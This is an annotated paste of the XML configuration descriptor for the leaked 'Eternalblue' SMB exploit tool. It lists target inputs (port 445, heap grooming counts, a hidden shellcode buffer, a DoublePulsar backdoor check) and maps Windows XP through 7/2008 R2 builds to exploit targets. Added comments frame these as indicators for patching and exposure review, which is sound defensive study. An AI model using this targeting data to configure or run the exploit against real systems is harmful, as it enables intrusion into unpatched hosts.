
Eternalblue

a guest May 19th, 2017 49 Never
  1. <?xml version='1.0' encoding='utf-8'?>
  2. <config xmlns='urn:trch' name='Eternalblue' version='2.2.0' schemaversion='2.1.0' configversion='2.2.0.0' id='0f38f55b6a88feccfb846d3d10ab4687e652e63e'>
       <!-- Module descriptor for the tool named 'Eternalblue' (version 2.2.0).
            It declares the operator-settable inputs, one output flag, a traffic
            redirection rule and the host-matching logic. Read as a threat
            intelligence artifact, it shows which service, port and Windows
            builds the tool is configured for, which is the information a
            defender needs for exposure review and patch prioritisation. -->
  3.   <inputparameters>
         <!-- Hidden parameter, default 0. Its role is only known from its own
              description string; nothing else in this file uses it. -->
  4.     <parameter hidden='true' type='TcpPort' name='DaveProxyPort' description='DAVE Core/Proxy Hookup connection port'>
  5.       <default>0</default>
  6.     </parameter>
         <!-- Signed 16-bit timeout in seconds for blocking network calls;
              default 60, and -1 means no timeout per the description. -->
  7.     <parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
  8.       <default>60</default>
  9.     </parameter>
         <!-- Target address and port. The port defaults to 445 and is described
              as the SMB service port, so inbound TCP 445 reachable from
              untrusted networks is the exposure this file points at. -->
  10.     <parameter xdevmap='TARGET_IP_V4_ADDRESS' type='IPv4' name='TargetIp' description='Target IP Address'/>
  11.     <parameter xdevmap='TARGET_PORT' type='TcpPort' name='TargetPort' description='Port used by the SMB service for exploit connection'>
  12.       <default>445</default>
  13.     </parameter>
          <!-- Default true: the SMB string returned by the host is compared
               with the selected Target before anything else is done. -->
  14.     <parameter xdevmap='ETERNALBLUE_VALIDATE_TARGET' type='Boolean' name='VerifyTarget' description='Validate the SMB string from target against the target selected before exploitation.'>
  15.       <default>true</default>
  16.     </parameter>
          <!-- Default true: the tool first checks whether the DOUBLE PULSAR
               backdoor is already present. For incident response this means a
               host may carry that implant from an earlier intrusion; its
               presence is an indicator of prior compromise. -->
  17.     <parameter xdevmap='ETERNALBLUE_VALIDATE_BACKDOOR' type='Boolean' name='VerifyBackdoor' description='Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.'>
  18.       <default>true</default>
  19.     </parameter>
          <!-- Unsigned 32-bit retry count, default 3; the description states it
               is disabled for XP/2K3. -->
  20.     <parameter xdevmap='ETERNALBLUE_MAX_EXPLOIT_ATTEMPTS' type='U32' name='MaxExploitAttempts' description='Number of times to attempt the exploit and groom. Disabled for XP/2K3.'>
  21.       <default>3</default>
  22.     </parameter>
          <!-- Unsigned 32-bit allocation count, default 12.
               NOTE(review): 'XK/2K3' in the description looks like a typo for
               'XP/2K3' (compare MaxExploitAttempts above); left as published
               because the string is part of the artifact. -->
  23.     <parameter xdevmap='ETERNALBLUE_NUMBER_SPRAY_ALLOCATIONS' type='U32' name='GroomAllocations' description='Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.'>
  24.       <default>12</default>
  25.     </parameter>
          <!-- Hidden, optional (required='false') buffer parameter; no default
               is declared in this file. -->
  26.     <parameter name='ShellcodeBuffer' required='false' xdevmap='EXPLOIT_SHELLCODE' hidden='true' type='Buffer' description="Shellcode buffer in hex (hint: use 'F:&lt;FILENAME&gt;' to load from file)"/>
          <!-- Target selector. The selected value is WIN72K8R2 and only two
               groups are declared here: XP and WIN72K8R2.
               NOTE(review): the logic section below binds Target to further
               values (W2K3SP0, W2K3SP1SP2, W2K3X64, VISTA2K8X86, VISTA2K8X64)
               that have no paramgroup in this file; how the tool treats them
               cannot be told from here. -->
  27.     <paramchoice xdevmap='TARGET_PLATFORM' name='Target' description='Operating System, Service Pack, and Architecture of target OS'>
  28.       <value>WIN72K8R2</value>
  29.       <paramgroup name='XP' description='Windows XP 32-Bit All Service Packs'/>
  30.       <paramgroup name='WIN72K8R2' description='Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs'/>
  31.     </paramchoice>
  32.   </inputparameters>
        <!-- Single output: a Boolean reporting that DOUBLEPULSAR was already
             installed on the host, as stated in the description. -->
  33.   <outputparameters>
  34.     <parameter xdevmap='ETERNALBLUE_DOUBLEPULSAR_PRESENT' type='Boolean' name='DoublePulsarPresent' description='Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown'/>
  35.   </outputparameters>
        <!-- Local TCP redirection rule: listen address and port come from the
             TargetIp and TargetPort parameters, the destination from the
             //identifier path and the port of the service named 'SMB', and the
             listener is closed on completion. How the surrounding framework
             applies this rule is not visible in this file. -->
  36.   <redirection>
  37.     <local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='//identifier' destport="//service[name='SMB']/port"/>
  38.   </redirection>
        <!-- Applicability rule. The 'and' element appears to require both an
             'smb' service entry (which binds Protocol to SMB and TargetPort to
             that service's port) and one of the OS entries under 'or'. -->
  39.   <logic>
  40.     <and>
  41.       <service name='smb'>
  42.         <bindtovalue name='Protocol' value='SMB'/>
  43.         <bindtopath path="//service[name='smb']/port" name='TargetPort'/>
  44.       </service>
            <!-- OS fingerprint to Target mapping. Listed builds: Windows XP
                 x86 (unspecified service pack and SP0 to SP3), Windows 2003
                 x86 SP0 to SP2 and x64 SP1 to SP2, Windows Vista and Windows
                 2008 x86/x64 SP0 to SP2, Windows 2008 R2 x64 SP0 to SP1, and
                 Windows 7 x86/x64 SP0 to SP1. For defenders this list is the
                 inventory of builds to prioritise for patching and for
                 restricting SMB exposure. -->
  45.       <or>
  46.         <os name='Windows XP' family='windows' architecture='x86 32-bit'>
  47.           <bindtovalue name='Target' value='XP'/>
  48.         </os>
  49.         <os servicepack='0' name='Windows XP' family='windows' architecture='x86 32-bit'>
  50.           <bindtovalue name='Target' value='XP'/>
  51.         </os>
  52.         <os servicepack='1' name='Windows XP' family='windows' architecture='x86 32-bit'>
  53.           <bindtovalue name='Target' value='XP'/>
  54.         </os>
  55.         <os servicepack='2' name='Windows XP' family='windows' architecture='x86 32-bit'>
  56.           <bindtovalue name='Target' value='XP'/>
  57.         </os>
  58.         <os servicepack='3' name='Windows XP' family='windows' architecture='x86 32-bit'>
  59.           <bindtovalue name='Target' value='XP'/>
  60.         </os>
  61.         <os servicepack='0' name='Windows 2003' family='windows' architecture='x86 32-bit'>
  62.           <bindtovalue name='Target' value='W2K3SP0'/>
  63.         </os>
  64.         <os servicepack='1' name='Windows 2003' family='windows' architecture='x86 32-bit'>
  65.           <bindtovalue name='Target' value='W2K3SP1SP2'/>
  66.         </os>
  67.         <os servicepack='2' name='Windows 2003' family='windows' architecture='x86 32-bit'>
  68.           <bindtovalue name='Target' value='W2K3SP1SP2'/>
  69.         </os>
  70.         <os servicepack='1' name='Windows 2003' family='windows' architecture='x64 64-bit'>
  71.           <bindtovalue name='Target' value='W2K3X64'/>
  72.         </os>
  73.         <os servicepack='2' name='Windows 2003' family='windows' architecture='x64 64-bit'>
  74.           <bindtovalue name='Target' value='W2K3X64'/>
  75.         </os>
  76.         <os servicepack='0' name='Windows Vista' family='windows' architecture='x86 32-bit'>
  77.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  78.         </os>
  79.         <os servicepack='1' name='Windows Vista' family='windows' architecture='x86 32-bit'>
  80.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  81.         </os>
  82.         <os servicepack='2' name='Windows Vista' family='windows' architecture='x86 32-bit'>
  83.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  84.         </os>
  85.         <os servicepack='0' name='Windows Vista' family='windows' architecture='x64 64-bit'>
  86.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  87.         </os>
  88.         <os servicepack='1' name='Windows Vista' family='windows' architecture='x64 64-bit'>
  89.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  90.         </os>
  91.         <os servicepack='2' name='Windows Vista' family='windows' architecture='x64 64-bit'>
  92.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  93.         </os>
  94.         <os servicepack='0' name='Windows 2008' family='windows' architecture='x86 32-bit'>
  95.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  96.         </os>
  97.         <os servicepack='1' name='Windows 2008' family='windows' architecture='x86 32-bit'>
  98.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  99.         </os>
  100.         <os servicepack='2' name='Windows 2008' family='windows' architecture='x86 32-bit'>
  101.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  102.         </os>
  103.         <os servicepack='0' name='Windows 2008' family='windows' architecture='x64 64-bit'>
  104.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  105.         </os>
  106.         <os servicepack='1' name='Windows 2008' family='windows' architecture='x64 64-bit'>
  107.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  108.         </os>
  109.         <os servicepack='2' name='Windows 2008' family='windows' architecture='x64 64-bit'>
  110.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  111.         </os>
  112.         <os servicepack='0' name='Windows 2008 R2' family='windows' architecture='x64 64-bit'>
  113.           <bindtovalue name='Target' value='WIN72K8R2'/>
  114.         </os>
  115.         <os servicepack='1' name='Windows 2008 R2' family='windows' architecture='x64 64-bit'>
  116.           <bindtovalue name='Target' value='WIN72K8R2'/>
  117.         </os>
  118.         <os servicepack='0' name='Windows 7' family='windows' architecture='x86 32-bit'>
  119.           <bindtovalue name='Target' value='WIN72K8R2'/>
  120.         </os>
  121.         <os servicepack='1' name='Windows 7' family='windows' architecture='x86 32-bit'>
  122.           <bindtovalue name='Target' value='WIN72K8R2'/>
  123.         </os>
  124.         <os servicepack='0' name='Windows 7' family='windows' architecture='x64 64-bit'>
  125.           <bindtovalue name='Target' value='WIN72K8R2'/>
  126.         </os>
  127.         <os servicepack='1' name='Windows 7' family='windows' architecture='x64 64-bit'>
  128.           <bindtovalue name='Target' value='WIN72K8R2'/>
  129.         </os>
  130.       </or>
  131.     </and>
  132.   </logic>
  133. </config>